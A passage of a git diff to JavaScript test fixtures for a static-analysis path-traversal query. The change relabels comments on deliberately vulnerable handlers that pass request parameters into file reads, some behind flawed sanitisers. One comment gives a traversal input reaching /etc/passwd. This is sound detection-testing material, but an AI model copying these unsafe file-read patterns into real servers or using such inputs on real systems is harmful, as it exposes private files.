atToZ = /[@-Z]/; // OK. matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file +var atToZ = /[@-Z]/; // OK - matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index f7c6d172ead2..2c915a920b16 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -6,6 +6,5 @@ import { join } from 'path'; var server = createServer(function(req, res) { let path = parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(readFileSync(join("public", path))); + res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index fd768fecfff8..b598cbee74bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js @@ -8,63 +8,52 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system - // BAD: This could still read any file on the file system - res.write(fs.readFileSync("/home/user/" + path)); + res.write(fs.readFileSync("/home/user/" + path)); // $ Alert - This could still read any file on the file system if (path.startsWith("/home/user/")) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path.indexOf("secret") == -1) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (fs.existsSync(path)) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt' || someOpaqueCondition()) - res.write(fs.readFileSync(path)); // BAD: Path is incompletely compared to white-list + res.write(fs.readFileSync(path)); // $ Alert - Path is incompletely compared to white-list path = sanitize(path); - res.write(fs.readFileSync(path)); // GOOD: Path is sanitized + res.write(fs.readFileSync(path)); // OK - Path is sanitized path = url.parse(req.url, true).query.path; - // GOOD: basename is safe + // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.dirname(path))); - // GOOD: extname is safe + res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved + // OK - extname is safe res.write(fs.readFileSync(pathModule.extname(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.normalize(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(x, path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(path, x))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); + res.write(fs.readFileSync(pathModule.join(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.join(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.normalize(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(x, path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(path, x))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); // $ Alert - taint is preserved }); var server = http.createServer(function(req, res) { // tests for a few uri-libraries - res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // NOT OK + res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // $ Alert }); (function(){ @@ -100,7 +89,7 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { @@ -113,36 +102,36 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - require('send')(req, path); // NOT OK + require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var split = path.split("/"); - fs.readFileSync(split.join("/")); // NOT OK + fs.readFileSync(split.join("/")); // $ Alert - fs.readFileSync(prefix + split[split.length - 1]) // OK + fs.readFileSync(prefix + split[split.length - 1]) - fs.readFileSync(split[x]) // NOT OK - fs.readFileSync(prefix + split[x]) // NOT OK + fs.readFileSync(split[x]) // $ Alert + fs.readFileSync(prefix + split[x]) // $ Alert var concatted = prefix.concat(split); - fs.readFileSync(concatted.join("/")); // NOT OK + fs.readFileSync(concatted.join("/")); // $ Alert var concatted2 = split.concat(prefix); - fs.readFileSync(concatted2.join("/")); // NOT OK + fs.readFileSync(concatted2.join("/")); // $ Alert - fs.readFileSync(split.pop()); // NOT OK + fs.readFileSync(split.pop()); // $ Alert }); @@ -150,33 +139,33 @@ var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); // OK. - res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // NOT OK - res.write(fs.readFileSync(path.replace(/[./]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\//g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); // OK - - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\./g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); + res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // $ Alert + res.write(fs.readFileSync(path.replace(/[./]/g, ''))); + res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); + res.write(fs.readFileSync(path.replace(/\//g, ''))); + res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); + + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\./g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\./g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // OK + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); + res.write(fs.readFileSync(path.replace(/\./g, ''))); + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); } // removing of "../" from prefix. - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); // OK + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); - res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // NOT OK - not normalized - res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - not normalized + res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - can be absolute }); import normalizeUrl from 'normalize-url'; @@ -184,38 +173,38 @@ import normalizeUrl from 'normalize-url'; var server = http.createServer(function(req, res) { // tests for a few more uri-libraries const qs = require("qs"); - res.write(fs.readFileSync(qs.parse(req.url).foo)); // NOT OK - res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // NOT OK + res.write(fs.readFileSync(qs.parse(req.url).foo)); // $ Alert + res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // $ Alert const parseqs = require("parseqs"); - res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // NOT OK + res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // $ Alert }); const cp = require("child_process"); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - cp.execSync("foobar", {cwd: path}); // NOT OK - cp.execFileSync("foobar", ["args"], {cwd: path}); // NOT OK - cp.execFileSync("foobar", {cwd: path}); // NOT OK + cp.execSync("foobar", {cwd: path}); // $ Alert + cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert + cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // NOT OK. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK -- Might be okay depending on what unknownFlags evaluates to. + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK - Might be okay depending on what unknownFlags evaluates to. }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // NOT OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); // OK + res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index 1fdbef68c47e..a3e4028b0daa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -7,6 +7,5 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // BAD: This function uses unsanitized input that can read any file on the file system. - res.write(fs.readFileSync(ROOT + filePath, 'utf8')); + res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js index ac8dd4fb9ba8..5b497cfddccb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js @@ -8,7 +8,7 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // GOOD: Verify that the file path is under the root directory + // OK - Verify that the file path is under the root directory filePath = fs.realpathSync(path.resolve(ROOT, filePath)); if (!filePath.startsWith(ROOT)) { res.statusCode = 403; diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js index 512b851592aa..93255a7ab518 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js @@ -26,27 +26,27 @@ function init() { init(); app.get('/some/path1', function (req, res) { - res.send(data.compiledFileAccess({ path: req.params.path })); // NOT ALLOWED (template uses vulnerable catFile) + res.send(data.compiledFileAccess({ path: req.params.path })); // $ Alert - template uses vulnerable catFile }); app.get('/some/path2', function (req, res) { - res.send(data.compiledBenign({ name: req.params.name })); // ALLOWED (this template does not use catFile) + res.send(data.compiledBenign({ name: req.params.name })); // OK - this template does not use catFile }); app.get('/some/path3', function (req, res) { - res.send(data.compiledUnknown({ name: req.params.name })); // ALLOWED (could be using a vulnerable helper, but we'll assume it's ok) + res.send(data.compiledUnknown({ name: req.params.name })); // OK - could be using a vulnerable helper, but we'll assume it's ok }); app.get('/some/path4', function (req, res) { res.send(data.compiledMixed({ prefix: ">>> ", - path: req.params.path // NOT ALLOWED (template uses vulnerable helper) + path: req.params.path // $ Alert - template uses vulnerable helper })); }); app.get('/some/path5', function (req, res) { res.send(data.compiledMixed({ - prefix: req.params.prefix, // ALLOWED (this parameter is safe) + prefix: req.params.prefix, // OK - this parameter is safe path: "data/path-5.txt" })); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 4fa6b3f50d54..2c251b8de379 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js @@ -10,21 +10,21 @@ let app = express(); app.get('/basic', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize', (req, res) => { let path = pathModule.normalize(req.query.path); - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize-notAbsolute', (req, res) => { @@ -33,21 +33,21 @@ app.get('/normalize-notAbsolute', (req, res) => { if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.startsWith(".")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith("../")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith(".." + pathModule.sep)) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/normalize-noInitialDotDot', (req, res) => { @@ -56,16 +56,16 @@ app.get('/normalize-noInitialDotDot', (req, res) => { if (path.startsWith("..")) return; - fs.readFileSync(path); // NOT OK - could be absolute + fs.readFileSync(path); // $ Alert - could be absolute fs.readFileSync("./" + path); // OK - coerced to relative - fs.readFileSync(path + "/index.html"); // NOT OK - not coerced + fs.readFileSync(path + "/index.html"); // $ Alert - not coerced if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/prepend-normalize', (req, res) => { @@ -73,9 +73,9 @@ app.get('/prepend-normalize', (req, res) => { let path = pathModule.normalize('./' + req.query.path); if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/absolute', (req, res) => { @@ -84,10 +84,10 @@ app.get('/absolute', (req, res) => { if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // NOT OK - can still contain '../' + res.write(fs.readFileSync(path)); // $ Alert - can still contain '../' }); app.get('/normalized-absolute', (req, res) => { @@ -96,10 +96,10 @@ app.get('/normalized-absolute', (req, res) => { if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // OK + res.write(fs.readFileSync(path)); }); app.get('/combined-check', (req, res) => { @@ -107,53 +107,53 @@ app.get('/combined-check', (req, res) => { // Combined absoluteness and folder check in one startsWith call if (path.startsWith("/home/user/www")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (path[0] !== "/" && path[0] !== ".") - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/realpath', (req, res) => { let path = fs.realpathSync(req.query.path); - fs.readFileSync(path); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert if (path.startsWith("/home/user/www")) fs.readFileSync(path); // OK - both absolute and normalized before check fs.readFileSync(pathModule.join('.', path)); // OK - normalized and coerced to relative - fs.readFileSync(pathModule.join('/home/user/www', path)); // OK + fs.readFileSync(pathModule.join('/home/user/www', path)); }); app.get('/coerce-relative', (req, res) => { let path = pathModule.join('.', req.query.path); if (!path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/coerce-absolute', (req, res) => { let path = pathModule.join('/home/user/www', req.query.path); if (path.startsWith('/home/user/www')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/concat-after-normalization', (req, res) => { let path = 'foo/' + pathModule.normalize(req.query.path); if (!path.startsWith('..')) - fs.readFileSync(path); // NOT OK - prefixing foo/ invalidates check + fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/noDotDot', (req, res) => { @@ -162,12 +162,12 @@ app.get('/noDotDot', (req, res) => { if (path.includes('..')) return; - fs.readFileSync(path); // NOT OK - can still be absolute + fs.readFileSync(path); // $ Alert - can still be absolute if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/join-regression', (req, res) => { @@ -181,119 +181,119 @@ app.get('/join-regression', (req, res) => { if (path.startsWith('/x')) {path;} else {path;} if (path.startsWith('.')) {path;} else {path;} - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (pathModule.isAbsolute(path)) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (path.includes('..')) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..') && !pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert let normalizedPath = pathModule.normalize(path); if (normalizedPath.startsWith('/home/user/www')) - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert if (normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')) - fs.readFileSync(normalizedPath); // OK - but flagged anyway [INCONSISTENCY] + fs.readFileSync(normalizedPath); // $ SPURIOUS: Alert else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert }); app.get('/decode-after-normalization', (req, res) => { let path = pathModule.normalize(req.query.path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); path = decodeURIComponent(path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // NOT OK - not normalized + fs.readFileSync(path); // $ Alert - not normalized }); app.get('/replace', (req, res) => { let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); if (!pathModule.isAbsolute(path)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert path = path.replace(/\.\./g, ''); - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/resolve-path', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); if (path.substring(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (path.slice(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity }); app.get('/relative-startswith', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); var relative = pathModule.relative(self.webroot, path); if(relative.startsWith(".." + pathModule.sep) || relative == "..") { - fs.readFileSync(path); // NOT OK! + fs.readFileSync(path); // $ Alert } else { - fs.readFileSync(path); // OK! + fs.readFileSync(path); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('..' + pathModule.sep) === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../')) { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } else { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } }); @@ -301,35 +301,35 @@ var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (pathIsInside(path, SAFE)) { - fs.readFileSync(path); // NOT OK - can be of the form 'safe/directory/../../../etc/passwd' + fs.readFileSync(path); // $ Alert - can be of the form 'safe/directory/../../../etc/passwd' return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } let normalizedPath = pathModule.join(SAFE, path); if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } @@ -338,34 +338,34 @@ app.get('/pseudo-normalizations', (req, res) => { app.get('/yet-another-prefix', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var abs = pathModule.resolve(path); if (abs.indexOf(root) !== 0) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert return; } - fs.readFileSync(path); // OK + fs.readFileSync(path); }); var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var requestPath = pathModule.join(rootPath, path); var targetPath; if (!allowPath(requestPath, rootPath)) { targetPath = rootPath; - fs.readFileSync(requestPath); // NOT OK + fs.readFileSync(requestPath); // $ Alert } else { targetPath = requestPath; - fs.readFileSync(requestPath); // OK + fs.readFileSync(requestPath); } - fs.readFileSync(targetPath); // OK + fs.readFileSync(targetPath); function allowPath(requestPath, rootPath) { return requestPath.indexOf(rootPath) === 0; @@ -376,56 +376,56 @@ import slash from 'slash'; app.get('/slash-stuff', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert - fs.readFileSync(slash(path)); // NOT OK + fs.readFileSync(slash(path)); // $ Alert }); app.get('/dotdot-regexp', (req, res) => { let path = pathModule.normalize(req.query.x); if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.match(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.match(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/join-spread', (req, res) => { - fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // NOT OK - fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // NOT OK + fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // $ Alert + fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // $ Alert }); app.get('/dotdot-matchAll-regexp', (req, res) => { let path = pathModule.normalize(req.query.x); if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.matchAll(/\./)) { - fs.readFileSync(path); // OK + 